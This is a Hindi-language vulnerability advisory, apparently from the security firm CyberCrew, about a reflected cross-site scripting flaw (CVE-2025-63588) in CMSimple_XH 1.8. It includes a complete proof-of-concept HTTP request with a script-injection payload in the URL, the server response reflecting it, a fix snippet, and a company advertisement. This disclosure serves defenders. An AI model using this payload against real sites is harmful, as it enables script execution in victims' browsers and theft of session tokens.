
अनुमानित CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (मध्यम)
निर्धारित CVE: CVE-2025-63588
उत्पाद: CMSimple_XH - 1.8
विक्रेता: CMSimple_XH - https://www.cmsimple-xh.org/
CMSimple_XH के फ्रंट-राउटर पार्सिंग कोड में एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है जो डायनेमिक लॉगिन-संबंधित इनपुट को संभालता है। एप्लिकेशन अनुरोध URI से प्राप्त हमलावर-नियंत्रित डेटा को उचित आउटपुट एन्कोडिंग के बिना सीधे उत्पन्न HTML में (उदाहरण के लिए फ़ॉर्म action विशेषताओं और एंकर hrefs में) प्रतिबिंबित करता है। एक हमलावर ऐसा URL तैयार कर सकता है जिसे पीड़ित द्वारा खोले जाने पर, कमजोर साइट के संदर्भ में पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादित हो जाता है।
यह एक परावर्तित XSS (गैर-स्थायी) है; शोषण के लिए पीड़ित का निर्मित लिंक पर क्लिक करना आवश्यक है। विक्रेता को सूचित कर दिया गया है और इस समस्या का दस्तावेजीकरण कर ऊपर दिया गया CVE निर्धारित किया गया है।
HttpOnly सेट नहीं हैं, तो सत्र टोकन चुराए जा सकते हैं।यह भेद्यता फ्रंट राउटर / index.php (या समकक्ष फ्रंट कंट्रोलर) कोड से उत्पन्न होती है जो डायनेमिक पथ खंडों को पार्स करता है और उन्हें पेज/टेम्पलेट चर में मैप करता है। रॉ पथ खंड (CMSimple_XH के राउटर द्वारा उपयोग किया जाने वाला ?Templates... शैली का खंड) बिना उचित HTML विशेषता एन्कोडिंग या सैनिटाइज़ेशन के पेज टेम्पलेट्स में पारित किए जाते हैं और HTML विशेषताओं में इंजेक्ट किए जाते हैं, जिससे इंजेक्टेड <script> टैग या अन्य पेलोड शब्दशः रेंडर हो सकें। इसी तरह की परावर्तित XSS समस्याएँ अन्य वेब घटकों के लिए भी प्रकाशित की गई हैं और ये आमतौर पर अविश्वसनीय इनपुट की अनुचित आउटपुट एन्कोडिंग के कारण होती हैं।
यह PoC हमलावर द्वारा प्रदत्त इनपुट के लौटाए गए HTML में प्रतिबिंबन को प्रदर्शित करता है, जो पीड़ित के ब्राउज़र में निष्पादित होगा।
अनुरोध:
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45
login=true&keycut=z9U%21q2k%21F0&submit=Login
प्रतिक्रिया:
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
जब पीड़ित का ब्राउज़र इस पृष्ठ को रेंडर करता है, तो इंजेक्टेड <script>alert(1)</script> निष्पादित हो जाता है।

$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';
https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576
यदि आपके कोई प्रश्न या परामर्श हों, तो कृपया बेझिझक संपर्क करें।
📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| आइटम | विवरण |
|---|---|
| कंपनी का नाम | 株式会社CyberCrew |
| पता | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
संगठन की कमजोरियों का बहुआयामी विश्लेषण कर सर्वोत्तम सुधार उपाय सुझाए जाते हैं।
लक्षित, परिदृश्य-आधारित और LLM पेंटेस्ट तक समर्थित।
गोपनीय जानकारी के लीक का शीघ्र पता लगाकर त्वरित कार्रवाई की जाती है।
व्यावहारिक हमले के परिदृश्यों पर आधारित रक्षा क्षमता का मूल्यांकन किया जाता है।
विकास के आरंभिक चरण से ही सुरक्षा पर विचार करने वाले डिज़ाइन में सहायता प्रदान की जाती है।
🌐 आधिकारिक वेबसाइट:https://www.cybercrew.co.jp
🕒 CyberCrew — आपका विश्वसनीय सुरक्षा साझेदार।